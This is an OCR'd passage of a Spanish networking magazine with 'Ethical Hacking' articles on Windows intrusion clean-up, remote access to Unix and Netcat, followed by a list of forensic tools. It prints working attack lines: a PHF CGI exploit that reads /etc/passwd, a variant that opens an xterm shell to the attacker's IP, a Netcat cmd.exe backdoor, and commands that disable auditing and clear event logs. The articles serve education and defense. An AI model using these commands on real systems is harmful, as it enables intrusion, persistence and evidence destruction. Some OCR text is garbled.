ficadas. En el caso de atacantes con menos conocimientos que 
no realicen esta acción facilitarán significativamente la labor del 
administrador. 

Algunos archivos que claramente representan herramientas de 
hacking son: nc.exe (Netcat), psexec.exe, etc. 

Por otro lado varios gusanos peligrosos y herramientas de 
hacking graban sus actividades en archivos de registro fácil- 
mente identificables como “TFTPxxx. 


Entradas de registro 


Otra forma de identificar herramientas instaladas en un sistema 
afectado es mediante la visualización de ciertas claves de regis- 
tro que permiten fácilmente identificar aplicaciones que se en- 
cuentran instaladas, estas claves son por ejemplo: 


HKEY_LOCALMACHINENSOFTWAREN 

HKEY_USERSN .DEFAULTASoftware. 

También se deben controlar aquellas aplicaciones que se ejecu- 
tan al iniciar un sistema estas se pueden ver en: 

H K E Y LOCcALMAGCcHqg INE 
ASOFTWAREANMicrosoftwindowsCurrentversioniRun 
, —RunOnce, RunOnceEx y  RunServices (solo 
windows 9x). 


Procesos 


En contra de aquellas herramientas que pueden ser renombra- 
das o reempaquetadas la realización de análisis de procesos 
regularmente es una buena medida a seguir. 

Para esto se utilizará el administrador de tareas de Windows 
que nos permitirá ver todos los procesos que se encuentren en 
ejecución. El sistema operativo Windows utiliza muchos proce- 
sos para su correcto funcionamiento, sumado a esto las aplica- 
ciones autorizadas (Ej. antivirus) iniciarán otros varios procesos 
y en ocasiones resultará difícil identificarlos a todos. En la si- 
guiente dirección se puede encontrar una lista de procesos 
comunes para así determinar su procedencia: 
http://www.sysinfo.org/startuplist.php 


Si se identifica un proceso no autorizado se puede remover me- 
diante el administrador de procesos o mediante las utilidades 
Tlist y Kill que aparecieron con el primer kit de recursos de 
Windows NT. Estas últimas utilidades permiten a un adminis- 

trador listar y eliminar un proceso que se encuentre en eje- » 


cución mediante su identificador. 


Posteriormente a la eliminación de este proceso en algunos 
casos se deberá remover la aplicación asociada desde el regis- 
tro ubicándolo en las claves mas arriba descriptas. 

Cuidado: La modificación del registro por parte de personas no 
especializadas puede ocasionar daños permanente en un 
sistema. 


Puertos 


Aunque una aplicación maliciosa haya sido renombrada al en- 
contrarse en ejecución utiliza determinados puertos para esta- 
blecer la comunicación con el atacante o viceversa. La herra- 
mienta “netstat” permite supervisar todos aquellas conexiones 
que se encuentran establecidas en un sistema. 

Para utilizarla deberá ingresar el comando Netstat desde una 
consola. ¿Se pueden investigar los parámetros que pueden a- 
compañar a esta herramienta tipeando netstat /? 

Un ejemplo de Netstat se encuentra a continuación: 


CiX>netstat 

Conexiones activas 

Proto Dirección local 
Estado 


Dirección remota 


Para facilitar la identificación de puertos es posible encontrar 
una lista completa de todos aquellos actualmente utilizados por 
aplicaciones en: http://www.iana.org/assignments/port-numbers 


Cubriendo las pistas 


Cuando un intruso ha obtenido privilegios de administrador 
sobre un sistema, intentará por todos los medios que su presen- 
cia no sea descubierta. Cuando toda la información de interés 
haya sido obtenida, el atacante querrá dejar en el sistema afec- 
tado instaladas herramientas de control y puertas traseras para 
así obtener fácil acceso futuro y continuar con su tarea. 
Existen varias formas que un atacante intentará utilizar para 
cubrir sus huellas, a continuación se enumeran algunas de 
ellas: 


Deshabilitar la auditoria 


Un administrador de sistema responsable normalmente audita 
ciertos eventos en su red para poder así evitar fallas técnicas o 
problemas de seguridad. En el caso que este administrador 
note algún tipo de evento sospechoso habilitará nuevas funcio- 
nes de auditoria que le permitan controlar mayores datos. 

Un atacante por todos los medios intentará deshabilitar la audi- 
toria del sistema que tiene por objetivo para de esta forma cubrir 
sus huellas que no se tomen medidas para frenar su actividad. 
La herramienta Auditpol incluida en el kit de recursos de 
Windows NT permitirá a un atacante mediante el ingreso de un 
comando por consola deshabilitar las funciones de auditoria. 
Para esto requerirá privilegios administrativos. 

Un ejemplo de lo expuesto se encuentra a continuación: 


Ci>auditpol /disable 
Running ... 


Local audit information changed successfully ... 
New local audit policy .. 


(0) Audit Disabled 


ATTE 


AuditcCategorySystem = No 
AuditCategoryLogon = Failure 
AuditcategoryobjectAccess = No 


Una vez que el atacante concluya con sus acciones habilitará 
nuevamente la auditoría del sistema con el parámetro “/enable”. 
Si un atacante logró deshabilitar la auditoría no habrá contrame- 
dida que se pueda aplicar, si olvida habilitarla nuevamente esta 
será la forma de descubrirlo. 


Limpiando el visor de sucesos 


El resultado de las políticas de auditoria implementadas por el 
administrador del sistema así como eventos de sistema o de a- 
plicaciones se registran en el visor de sucesos. 

Un administrador utiliza este registro para poder analizar todo lo 
que ha sucedido con su sistema desde el punto de vista de la 
seguridad y del correcto funcionamiento. Por lo que esto con- 
vierte al visor de sucesos en otro de los objetivos del atacante. 
La herramienta Elsave tiene como objetivo la eliminación de los 
datos almacenados en el registro mediante el uso de un 
comando. 


CiW>elsave -s Mserver -1 “Security” -C 


¿Cómo protegerme?: Para que esta herramienta pueda ser u- 
tilizada se requerirá contar con los privilegios adecuados en el 
sistema por lo que serán necesarias tomar todas las medidas 
expuestas hasta el momento. 


Ocultando archivos 


Muchas herramientas que un atacante utiliza para sus activida- 
des son alojadas en el sistema afectado para facilitar su tarea. 
Un administrador que normalmente supervisa sus sistemas 
descubrirá la existencia de las mismas y sospechará de la exis- 
tencia de un ataque, por lo que un atacante intentará hacer que 
estas mencionadas herramientas no se encuentran visibles. 
Mediante el uso del comando Attrib el atacante asignara a los 
archivos el atributo de “ocultos” para cumplir este objetivo, por 
defecto los sistemas Windows de ocultan archivos ocultos y de 
sistema por lo que a menos que el administrador no tenga ha- 
bilitado su equipo para mostrarlos podrán pasar desapercibi- 
dos. 

Un ejemplo del uso del comando Attrib es: 


CiWattrib +H C:inombre_directorio 


Los sistemas Windows de la familia NT con el sistema de archi- 
vos NTFS ofrecen además otros atributos a nivel de archivo que 
pueden ser utilizados por un atacante, para esto usará herra- 
mientas como Posix que mediante la ejecución de un comando 
le permitirá modificar los atributos de los archivos de las herra- 
mientas de hacking que este utilizando y dificultar en gran 
manera su descubrimiento. 

¿Cómo protegerme?: Para evitar que el atacante logre su ob- 
jetivo un administrador deberá configurar sus servidores para 
que muestren todos los archivos ocultos y de sistema, de esta 
forma será tarea sencilla detectar archivos sospechosos. 


Bibliografía: 


Hacking Exposed a4th Eq. (Stuart McClure, Joel Scambray y 
George Kurtz), McGraw Hill/Osborne, 2004. 
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NEX> Revista de Networking y Programación 


Ethical Hacking 
Paso 6: HACKING UNIX 


Por: Carlos Vaughn O"Connor 


Parte 1 de 2: Acceso Remoto 
Root. 


UNIX nace en 1969 como un Sistema Operativo (SO) multitas- 
king y multiusuario. Sus creadores fueron Ken Thomson y 
Dennis Ritchie. De él han derivado otros: Linux, BSD. 

En todos ellos se establecen dos (2) niveles de acceso: Root y 
el resto. Root es el ADMINISTRADOR en mi SO. 


¿Qué hemos visto en los pasos anteriores? 


Hemos entendido los conceptos como footprinting y enumera- 
ción. Herramientas como nmap permiten identificar puertos 
TCP/IP abiertos (o en escucha) como también conocer el 
sistema operativo de la máquina blanco. “rpcinfo” enumera ser- 
vicios RPC y “showmount” nos dice puntos de montaje NFS. 
Existen herramientas muy completas como netcat (nc) que nos 
permitían obtener banners y mucho más. 

Es decir, puedo elegir el sistema a atacar y de él conozco su IP, 
que servicios corre, que versiones de esos servicios están fun- 
cionando. El hacker es como un cazador en busca de su presa. 
Primero busca huellas (footprinting), luego estudia el entorno en 
el que ésta vive y sus características. Solo falta ver que flaque- 
za (vulnerabilidad) puede aprovechar para aplicar un ataque 
(exploit). 

Con esta información de los pasos anteriores debo evaluar po- 
sibles vulnerabilidades. Esto se llama “vulnerability mapping”. 
Es decir, hallar los atributos de un sistema y su vulnerabilidad 
asociada ( Ej. ¿Qué puerto está abierto asociado a qué servi- 
cio?, ¿qué versión de la aplicación?, ¿bajo qué arquitectura?, 
¿Qué UID (usuarios) existen en esa máquina?. La pregunta es 
¿qué agujeros de seguridad pueden tener esos atributos? Por 
ejemplo, si el servicio http está usando el puerto 80 y corre bajo 
Apache versión xxx, ¿Existe una vulnerabilidad asociada? 
¿Cómo se logra el vulnerability mapping? 

1) Asocio el atributo a información sobre vulnerabilidades ex- 
puestas públicamente. Por ejemplo listas como bugtraq 
(http://www. securityfocus.com), computer emergency response 
team (CERT) (www.cert.org) y alertas de vendors 

2) Utilizo exploits y chequeo la existencia de la vulnerabilidad 
3) Utilizo una herramienta que lo realiza en forma automática 
como por ejemplo Nessus (ver NEX IT Specialist +13, pag. 72). 


Los pasos del hackeo 


Igual que en el caso de técnicas de hacking de sistemas opera- 
tivos Windows descriptos en los pasos 5 y 6 debemos distinguir 
dos acciones diferentes: Acceso Remoto y Acceso local. 
Definimos “Acceso remoto” como las acciones a realizar para 
obtener acceso a través de la red o algún otro canal de comu- 
nicación. Por ejemplo, un sistema puede estar dando un servi- 
cio escuchando en un cierto puerto. El acceso es a través de 
ese puerto explotando una vulnerabilidad de la aplicación co- 
rrespondiente. 

Definimos acceso local como las acciones a realizar para 
acceder vía una “shell de comandos” o haciendo login al 
sistema. A estos ataques se lo llama también “ataques de esca- 
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lada de privilegios”. 

La secuencia de obtener primero acceso remoto y luego 
acceso local es el modo más común de como operan los 
hackers. Usando alguna herramienta (exploit) sobre una dada 
vulnerabilidad en algún servicio expuesto por nuestro sistema 
logran obtener un “shell de comandos”. 

En este momento, ya están localmente en nuestra máquina. 
Muy probablemente con privilegios de usuario común. El paso 
siguiente es escalar en privilegios para llegar a tener derechos 
de “root”. 

¿Qué sigue? Pilfering. Esto se entiende como “sondeo y robo”. 
Primero, averiguando (ya como root) todo sobre el sistema 
comprometido. Luego avanzando a otros sistemas de nuestra 
red. En nuestro sistema, dejará instado algún modo de retornar 
(backdoors, troyano o rootkit) y así ocultará todo lo que delate 
su accionar. 

Las vulnerabilidades y exploits asociados son muchísimos. Las 
vulnerabilidades son reparadas por los vendors y nuevas apa- 
recen. Sumado a esto, la variedad es amplia ya que existen 
números aplicaciones y numerosos sistemas UNIX-like. 

Aquel que desee compenetrarse de las herramientas de 
hacking actuales en UNIX deberá obtener la ultima versión de 
libros como: Linux-Hacking Exposed (autores Brian Hatch, 
James Lee y George Kurtz ) Osborne/Mc Graw Hill. La traduc- 
ción al español es “sorprendentemente” buena). 

En lo que sigue les detallaremos los principios básicos sobre las 
vulnerabilidades y exploits en sistemas UNIX. Esto nos permiti- 
rá entender qué sucede detrás de cualquier vulnerabilidad par- 
ticular vigente. 


Acceso remoto 


En la definición dada, se nombraba acceso a través de la red o 
de otro canal de comunicación. Esto último puede ser por 
ejemplo un MODEM al que accedo discando. Vulnerabilidades 
y exploits existen, para acceso al MODEM vía el teléfono, pero 
no serán tema de nuestro artículo donde solo nos referimos al 
acceso vía la red. 

Existen 4 modos para acceder remotamente a un sistema 
UNIX-like 

A.- Usar un exploit sobre un servicio que “escucha” en un dado 
puerto y que tiene una vulnerabilidad. 
Ejemplo 1: tengo mi máquina con el servicio “ssh” habilitado. Si 
alguien conoce un UID y password (por ejemplo vía ingeniería 
social) podrá acceder a la máquina sin estar “fisicamente” cerca 
de ella. Aunque el ejemplo es trivial nos indica la idea: solo 
podrá acceder si existe un servicio “escuchando”. Ejemplo2: 
tengo un servidor ftp “escuchando” sobre el puerto 21. Si 
alguien descubre una vulnerabilidad sobre el código del servicio 
ftp, él o algún otro inventará utilizar un “exploit” de modo de 
lograr acceder remotamente a nuestro sistema. 

B.- Si un sistema UNIX-like esta dando algún tipo de seguridad 
(función de firewall por ejemplo) entre varias redes es posible 
rutear a través de él. Ejemplo: puedo tener un firewall (bajo 
UNIX) que bloquee todos los puertos de modo de no dejar 
entrar tráfico TCP/IP. Pero ¿qué sucede si el kernel UNIX > 


tiene habilitado IP forwarding? El que ataca no es visto por la a- 
plicación “firewall”. Simplemente rutea vía el kernel UNIX. 

C.- Usar un usuario de un sistema UNIX y a través de él reali- 
zar el acceso remoto (el usuario puede visitar un sitio web que 
descarga algún mecanismo para comprometer su máquina, 
puedo enviarle un e-mail con un troyano atachado) 

D.- Si alguna aplicación o proceso que estemos usando pone 
nuestra placa de red en modo promiscuo es posible que alguien 
nos realice un exploit. “tcp dump” es un sniffer. ¿Qué sucede si 
decido ponerlo activo? Mi placa queda en modo promiscuo. Si 
aparece una vulnerabilidad en el código de “tcp dump” segura- 
mente alguien usará un exploit sobre mi máquina. 


Modos de acceso remoto 


Ataques de adivinación de passwords (pass- 
word guessing) (Brute force o fuerza bruta) 


La idea es muy simple: ¿Qué pasa si un servicio ofrecido en red 
solicita autenticación?. Yo escribo UID y password. Si pruebo 
distintas combinaciones podría adivinar la correcta. En realidad 
es casi imposible lograrlo a menos que conozca por ejemplo el 
UID (recordemos que de fingerprinting/enumeración era posible 
en algunos casos). Herramientas como Finger, Rusers nos 
pueden dar tal información. 

¿Qué servidores comunes piden autenticación?: Telnet, FTP, 
los llamados comando R (rlogin, rsh...), Secure Shell (ssh), 
SNMP, POP, IMAP,HTTP/HTTPS. 

Aquí es donde se ve la importancia de “passwords” bien elegi- 
dos (ver artículo en Nex +13 “Passwords vs. Passphrases”, 
parte 1 y en esta edición: parte 2). 

Existen utilidades que realizarán esta “adivinación” de pass- 
words en forma automática: citaremos solo una Pwscan.pl 
(http://r2zor.bindview.com/tools/vlad/index.shtml) 

Otras utilidades permiten al administrador protegernos y moni- 
torear los passwords elegidos por los usuarios de modo de ase- 
gurar que cumplan lo exigido por las políticas establecidas. 


Ataques “causados por datos” (data driven 
attacks) 


Los “data driven attacks” (DDA) se han transformado en el 
modo más común de tener acceso remoto. Un ataque DDA se 
realiza enviando datos a un servicio activo que causa resulta- 
dos no deseados o no programados. Para un hacker por su- 
puesto una respuesta “no deseada” o “no programada” es lo 
buscado. 

Los DDA se pueden dividir en: Ataques de Buffer Overflow (y 
una variante llamada “Format String Attacks”) o Ataques de 
Validación de Inputs (Input Validation Attacks). 


Ataques de Buffer Overflow (Desbordamiento de Buffer): 


En programación, un desbordamiento de buffer es una condi- 
ción anómala donde un programa escribe de alguna manera, 
datos más allá del límite asignado en un buffer (area de alma- 
cenamiento temporario) en la memoria. Los desbordamientos 
de buffers se presentan generalmente como consecuencia de 
un “bug” (error en la programación). Dado que los datos de 
control de programas se ubican a menudo en las áreas de 
memoria adyacentes a buffers de datos, por medio de una con- 
dición de desbordamiento de un buffer la computadora puede 
ser obligada a ejecutar código arbitrario y potencialmente malé- 
volo. 


AT ES 


Generalmente, el problema del desbordamiento del buffer es 
causado por la programación descuidada. Evitarlo sigue siendo 
un proceso manual pues la mayoría de los sistemas formales 
de verificación todavía han probado ser inalcanzables en los 
lenguajes de programación modernos. Los desbordamientos de 
buffer son comunes solamente en los programas escritos en 
lenguajes de programación de relativamente bajo nivel, tales 
como assembly, C, y C++ que requieren del programador 
manejar manualmente el tamaño de la memoria asignada. 
Muchos lenguajes de programación tales como Java y Lisp 
manejan la asignación de memoria automáticamente y utilizan 
una combinación de comprobación de tiempo de pasada y del a- 
nálisis estático que hace difícil o imposible un bug de desborda- 
miento de buffer. Sin embargo, los sistemas y las bibliotecas runti- 
mes para tales lenguajes pueden sin embargo, de vez en cuando, 
tener desbordamientos de buffer debido a los errores internos de la 
puesta en práctica en los sistemas de comprobación. 

Una variante de Buffer Overflow es: 

Format String Attacks 

Durante muchos años se habló de la posibilidad de este tipo de 
ataques. Finalmente a mediados del 2000 fueron usados. 
“Format String” y “Buffer Overflow” son parecidos en espíritu y 
provienen de mala programación. 

Una vulnerabilidad tipo “Format String” surge en errores de pro- 
gramación muy específicos en la familia de funciones de 
outputs con formato (tipo printf ( ) y sprintf ( ). Si un atacante 
pasa strings de texto muy cuidadosamente preparados, conte- 
niendo directivas de formateo, pueden hacer que la computado- 
ra objetivo ejecute comandos arbitrarios. Esto representa un 
riesgo grande si la aplicación está corriendo con privilegios de 
Root. 


Ataques de Validación de Input (Input Validation Attacks- 
IVA) 


El típico ejemplo de IVA es la tristemente famosa vulnerabilidad 
PHF, reportada por J. Myers en 1996. PHF es un muy divulga- 
do Script de CGl que venía estándar en Apache y NCSA 
HTTPD. 

Un “Input Validation Atack” ocurre cuando: 

1) un programa no reconoce que un input dado es incorrecto del 
punto de vista sintáctico 

2) un módulo acepta input diferente al esperado. 

3) un módulo falla al manejar campos de input faltantes. 

4) aparece un error en la correlación del campo y su valor. 
Veamos en detalle cual era la vulnerabilidad de PHF. El script 
básicamente aceptaba el carácter (%2a) (nueva línea) y ejecu- 
taba cualquier comando que siguiese con los privilegios de UID 
que corriese el servidor Web. 

El exploit original era: 


/cgi-bin/phf?Qa1lias=x%0a/bin/cat%20/etc/pass- 
word [1] 


La linea anterior logra hacer cat del archivo de passwords (cat 
es un comando UNIX que concatena archivos). Es decir lograba 
darme los UID y las passwords encriptadas (asumimos que los 
archivos de passwords no están “shadowed”). 

Usado de este modo un hacker con poca experiencia se 
hubiese dedicado posteriormente a crackear el archivo de pass- 
words y logonearse al sistema vulnerable. 

Pero, como veremos a continuación y debido a que esta vulne- 
rabilidad me permite ejecutar “cualquier” comando con el UID 
que corre el web server, puedo hacer algo más sofisticado. 

En la mayor parte de los casos el UID es “nobody”, pero se 
encontraron casos en los que el servidor web corría bajo el » 
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NEX> Revista de Networking y Programación 


Web Server 


Firewall 


UID root. Lo que acabamos de describrir para el caso de PHF, 
ejemplifica una metodología de “exploit” mucho más amplia. 
Recordemos que en UNIX los “metacaracteres” incluyen 
(aunque hay otros) : V<>/$%28*|(P[]”"=;). Si un programa o 
script CGl acepta input del usuario y no validara estos datos, el 
programa podría ser engañado a ejecutar código arbitrario. La 
metodología se llama “copying out” (copiando) a un shell y con- 
siste, como en el caso PHF, en pasar uno de los metacaracte- 
res UNIX como parte del input que provee el usuario. 


Cómo obtener acceso remoto a un sistema 
UNIX 


Ya describimos los dos modos más usados de acceso remoto 
1) Ataques de fuerza bruta. 

2) Data driven attacks (Buffers Overflows o input validation 
attacks). 

Recordemos que lo que busca un atacante es poder ejecutar 
“comandos de línea”o acceso a un shell. 

Normalmente acceso interactivo a un shell se obtiene logone- 
ándonos remotamente a un servidor Unix vía Telnet, rlogin, o 
ssh. A esto se puede sumar la ejecución de comandos vía rsh, 
ssh o rexec sin la necesidad de tener un login interactivo. 

Pero ¿qué sucede si esos servicios no están habilitados o blo- 
queados por un Firewall? ¿Cómo puede un atacante obtener 
acceso a un shell? 

Lo que sigue será una ejemplificación sobre un servidor web 
que está detrás de un firewall o router filtrando paquetes (ver 
figura). Lo único que permite pasar el firewall son paquetes a 
los puertos 80 y 443 (HTTP y HTTPS). Supongamos que 
nuestro web-server es vulnerable a un ataque de “input valida- 
tion” tal como el PHF descripto anteriormente y que corre con 
los privilegios de “nobody”. Es decir, en principio un atacante 
podrá ejecutar código en el web-server como usuario “nobody”. 
Supongamos además, que el web-server tiene habilitado el ser- 
vicio de X-Windows (X es una facilidad que permite obtener 
ventanas y a diferentes programas compartir un entorno 
gráfico). X hace que un cliente (programa local que usa X) 
muestre su salida al servidor X local, o a un servidor X remoto 
que escucha en los puertos 6000-6013. 

Quizás el cliente X más popular es “xterm”. En particular, la 
opción —display permite dirigir un shell de comandos al servidor 
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Servidor de correo 
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Servidor FTP 


Aleph One y el renacimiento de Buffer Overflows 


El artículo aparecido en “Phrack Magazine” +49 (1996), 
“Smashing the Snack Fun and Profit” (“Reventando el stack 
por diversión y ganancias”) cambió el mundo de la seguridad 
informática. Aleph One su autor y moderador de Burgtrq (uno 


de los mailing lists más prestigiosos de listas de vulnerabili- 
dades) hizo saber cómo prácticas de programación pobres 
llevan a que nuestros sistemas puedan ser comprometidos. 
Los ataques de Buffer Overflow se remontan a 1988 y el 
“famoso” incidente del Robert Morris Word. 


X del atacante. Como vemos, justo lo que necesitamos. 

Pero ahora podemos usar el exploit de PHF descripto anterior- 
mente y en lugar de pedirle que nos muestre el archivo pass- 
word, enviamos un comando que nos de acceso a un shell. Sólo 
reemplazamos en /1] el comando 


bin/cat%20/etc/password 
por: 


/úusr/x11R6/bin/xterm%20-ut- 
display%20IP_del_hacker :0.0 


quedando: 
/cgi-bin/phf?Q0alias=x%0a/usr/Xl11R6/bin 
/xterm%20-ut-display%20IP_del_hacker:0.0 


Síntesis 


El web-server atacado (remoto) ejecutará “xterm” y hará un 
display de la salida en el servidor cuya IP le provee con un ID 
de ventana y un ID de pantalla. El atacante tiene TOTAL control 
del servidor. Como usamos la opción —ut la actividad NO será 
auditada por el web-server. %20, utilizado nos da un espacio 
(representación hexadesimal). De este modo el atacante logró 
acceso remoto (obtuvo un shell interactivo) sin logonearse a 
ningún servicio del servidor web. 

Los privilegios de shell serán los mismos con los que corre el 
servicio web. En nuestro ejemplo “nobody”. Vía acceso remoto 
el atacante logra una shell (acceso local). 

Próximo paso: “escalada de privilegios”, llegar a ser Root. Pero 
eso lo veremos en nuestra próxima edición de NEX. d 


AT ES 


Tools 


Netcat: La navaja suiza 


por Leonel Becchio 


Es muy acertado denominar de tal manera a Netcat, dada la 
amplia cantidad de tareas que permite que sean hechas. Netcat 
es la segunda herramienta más popular utilizada en el mundo, 
pues con ella puede reemplazarse a una suite de herramientas. 
Netcat es un cliente telnet, básicamente su función primordial 
es la lecto-escritura de datos a través de conexiones TCP o 
UDP. Por tal motivo, como puede ser especificado el puerto de 
trabajo, Netcat puede ser usado como scanner de puertos, re- 
director de puertos, puerta de acceso trasero (backdoor) y otras 
tantas cosas. Tal vez no sea la mejor herramienta o la más 
cómoda para trabajar, pero esta utilidad brinda lo necesario 
para suplir los requerimientos de una completa tarea de 
hacking por sí sola. La ventaja es que Netcat puede trabajar 
como cliente y servidor. Debemos aclarar que como todo cliente 
telnet, cada cosa que tipeemos, primero viaja hacia la consola 
remota y si es que existe un puerto a la escucha, vuelve y es 
mostrada en la consola local. Por tal motivo deberemos colocar 
dos consolas corriendo Netcat, una local y una funcionará como 
remota. Netcat proviene de la época de los sistemas operativos 
Unix, de hecho fue lanzado primeramente para aquellos siste- 
mas y posteriormente apareció la versión para el entorno 
Windows NT. Su nombre es una derivación del comando Unix 
cat que se utiliza para concatenar archivos. Asimismo Netcat se 
utiliza para concatenar sockets TCP y UDP. La utilidad fue de- 
sarrollada para ser trabajada desde una consola por línea de 
comandos invocando el comando nc . Sería demasiado extenso 
mencionar todos los parámetros disponibles para usar con 
Netcat, por tal motivo veremos los más utilizados en algunos de 
los casos que describiremos. 


Port Scanning 
nc -v -w2 -z dir IP destino 1-200 


En este caso Netcat tratará de conectarse a cada puerto entre 
el puerto 1 y el 200 de la dirección IP que especifiquemos. 
Probablemente informe sobre aquellos servicios que se en- 
cuentren corriendo en puertos comprendidos entre dichos 
límites. La opción —v (verbose) brinda información detallada 
cuando la aplicación arroja el resultado. La opción —w (wait) 
permite esperar una cantidad de tiempo determinada (en se- 
gundos) para que se genere la conexión TCP. La opción —-z, por 
su parte, previene que sea enviada información adicional a una 
conexión TCP mientras está bajo prueba, se puede insertar una 
demora de tiempo entre cada prueba de puertos con el agrega- 
do de —¡. El uso de —z es útil como escaneo rápido para ver qué 
puertos responden. 


Ciltools>nc -v -w2 -z 192.168.1.90 1-200 
<UNKNOWN> [192.168.1.90] 139 <netbios-ssn>open 
<UNKNOWN> [192.168.1.90] 135 <epmap> open 
<UNKNOWN> [192.168.1.90] 119 <nntp> open 
<UNKNOWN> [192.168.1.90] 80 <http> open 
<UNKNOWN> [192.168.1.90] 25 <smtp> open 
<UNKNOWN> [192.168.1.90] 21 <ftp> open 


Rh pp 


C:iXtools> 


En la figura podemos apreciar los puertos que respondieron a 
la prueba. Debemos aclarar que para probar Netcat en una 


misma máquina debemos especificar 127.0.0.1 como dirección 
IP de loopback o bien reemplazarla por la palabra localhost. 


Transferencia de archivos con Netcat 

Esto mismo podría ser realizado con alguna herramienta que 
trabaje el protocolo TFTP, pero lo haremos con Netcat. 
Recordando que Netcat es un cliente/servidor telnet, debemos 
abrir dos consolas: una funcionará como consola remota y será 
nuestro servidor, la otra funcionará como consola local y será 
nuestro cliente tratándose de conectarse al servidor. 

En la consola remota escribiremos: 


nc -1 -p 6000 > prueba.txt 


Aquí lo que hacemos es poner el puerto 6000 a la escucha y 
prepararlo para aceptar por él el archivo prueba.txt. El comando 
—| (listen) pone a la escucha el puerto especificado con —p 
(port). Es importante aclarar que así como el protocolo TFTP no 
posee una instancia de autenticación (uno de los motivos que lo 
diferencian de su par FTP), con Netcat obligamos a transferir el 
archivo especificado por la fuerza. Esto trae como consecuen- 
cia que sea una herramienta apta para utilizarse junto a una 
puerta trasera de acceso (backdoor) dado que una vez encon- 
trada la forma de mantener dicho orificio, será muy fácil trans- 
ferir datos en ambos sentidos. 

En la consola local escribiremos: 


nc dir IP consola remota 6000 < prueba.txt 


Aquí lo que hacemos es indicarle a nuestro cliente que se 
conecte a la dirección IP en cuestión y que envíe el archivo 
prueba.txt dirigido al puerto 6000. 

Nota: Puede parecer confuso el uso de los direccionadores < >, 
pero su uso se entiende de la siguiente manera. El contenido 
del archivo situado a la derecha del comando se direcciona (<) 
al puerto 6000 bajo la correspondiente IP del lado del cliente. 
Por su parte, del lado del servidor se vuelca el contenido que 
viene por el puerto 6000 al archivo .txt en cuestión (>) situado a 
la derecha. De esta forma, el archivo viaja desde el cliente hacia 
el servidor y no al revés como puede pensarse. 

Lo que se suele hacer con este par de comandos es transferir 
datos desde y hacia un servidor que está siendo atacado. En 
primera instancia se genera la puerta de acceso trasera para 
poder entrar libremente cuando se lo requiera, posteriormente 
se envía por única vez una copia de la herramienta netcat al 
servidor atacado. Finalmente desde la máquina del intruso se 
manipula remotamente la utilidad enviando y recibiendo datos a 
placer. 


Netcat como un backdoor 


Como última aplicación citamos el uso de netcat una vez que se 
encuentra en el servidor comprometido, es decir una vez en- 
contrado el agujero por donde ingresar una y otra vez. 

Una vez que hayamos subido una copia de netcat al servidor 
atacado, seguramente será nuestro deseo poder contar con 
dicha utilidad cuando la necesitemos. La idea es que netcat 
pueda escuchar un puerto específico y pueda conectarse remo- 
tamente desde nuestra máquina atacante. 

Con el comando nc —L —p 10001 —d —e cmd.exe La opción —L 
(mayúscula) le indica a netcat que no se cierre, que espere por 
más conexiones activándose cuando nos conectemos al puerto 
especificado por la opción —p. La opción —d (detach) le indica a 
netcat que se separe del proceso que queremos que corra. 
Posteriormente la opción —e (execute) le indica que ejecute el 
programa especificado a continuación, o sea la consola de co- 
mandos cmd.exe. y 
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Herramientas de Informática Forense 


EnCaseO 
(http://www.encase.com) 


EnCase0 Forensic Edition (ver- 
siones para Windows XP o DOS) 
ofrece las características más a- 
vanzadas para el forense o in- 
vestigador informático. Con un GUI intuitivo y flexible, y un fun- 
cionamiento incomparable, el software provee a los investiga- 
dores las herramientas para conducir investigaciones comple- 
jas con exactitud y eficacia. Entre sus atracciones podemos de- 
tallar que se puede solicitar un CD con el demo para conocer el 
producto antes de comprarlo 
http://www.encase.com/products/demorequest.shtm 


SOFTWARE 


Suidanca, 


dd for Windows 
(http://users.erols.com/gmgarner/forensics) 


Ésta es una colección de utilidades y de librerías previstas para 
el uso forense en un entorno moderno de Microsoft Windows. 
Los componentes en esta colección están pensados para per- 
mitir que el investigador esterilice los medios para la duplicación 
forense, descubrir dónde está localizada la información lógica 
del volumen y recoger la evidencia de un sistema que está co- 
rriendo garantizando al mismo tiempo la integridad de los datos 
(Ej.: con una suma de comprobación criptográfica) y minimizan- 
do los cambios en el sistema sujeto. El código está disponible 
bajo licencia pública GNU. Se puede encontrar una copia de la 
licencia acompañando esta distribución. 


Forensic Replicator v 3.01 
(http://www.paraben-forensics.com) 


2 paraben 


Los medios electrónicos pueden 
ser la llave para resolver un caso 
y en esos casos nada es más im- 
portante que adquirir esos datos. 
Forensic Replicator de Paraben puede acceder a una amplia 
gama de medios desde un disquete hasta un disco rígido. 
Nueva opción de imagen Drive-to-Drive 

Crea imágenes de medios removibles, particiones, o un dispo- 
sitivo físico entero. 

Crea imágenes de micro dispositivos USB. 

Comprime archivos de la imagen en curso. 

Encripta los datos para el almacenaje seguro de evidencia 


ProDiscover0 v 2.0 


(http: //www.techtpathways.com/desktopDefault. 
aspx?tabindex=48:tadid=12) 


PRODISC VER una herramienta poderosa que 


0 
es Sor Wocoss permite a profesionales informáti- 
cos encontrar todos los datos almacenados en un disco de compu- 
tadora mientras protege la evidencia y crea informes de calidad, 
basados en la evidencia, para su uso en procesos jurídicos. 


ProDiscoveréd) para Windows es 
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NTImage (beta) 
(http://www.dmares.com) 


El programa NTlmage está diseñado para poder crear imáge- 
nes forenses (dentro de las capacidades del SO) mientras fun- 
ciona directamente bajo NT, W2K y XP. Un uso de este progra- 
ma es para crear imágenes de un dispositivo cuando el sistema 
no puede ser apagado. Otras capacidades son: 

Crear un disco para clonarlo. 

Crear archivo de salida para la imagen, un archivo común, o 
secciones para escribir al CD. 

La ejecución de hashes CRC32, MD5, SHA1, SHA2 (256, 384, 
512bit), en el dispositivo mientras e independientemente de 
cuándo se crea la imagen. 


SafeBack v 3.0 
(http://www.forensics-intl-com/safeback.html) 


! SafeBack se utiliza para crear i- 
SafeBack?" mágenes “espejo” de discos 
CHAS rígido O para hacer crear imáge- 

nes “espejo” de una partición del disco rígido. 

El proceso es análogo a la fotografía y a la creación de un ne- 
gativo. Una vez que se haya hecho el negativo de la foto se 
pueden hacer varias reproducciones exactas de la original. A di- 
ferencia de tomar una foto, los archivos de imagen de SafeBack 
no se pueden alterar o modificar para alterar la reproducción. 
Esto es porque SafeBack es un estándar de auto-autenticación 
de la industria forense informática. 


Forensic ToolKit (FTK) v 1.32 
(http:/)www.accessdata.com) 


Forensic 
Toolkit" 


Forensic Toolkit) de 
AccessData (FTKTM) ofrece a 
la ley y a profesionales corpora- 
tivos de la seguridad la capaci- 
dad de realizar completas y cui- 
dadosas examinaciones foren- 
ses de computadoras. FTK 
ofrece funcionalidad de gran 
alcance en la búsqueda de ar- 
chivos. FTK es reconocida como la herramienta forense princi- 
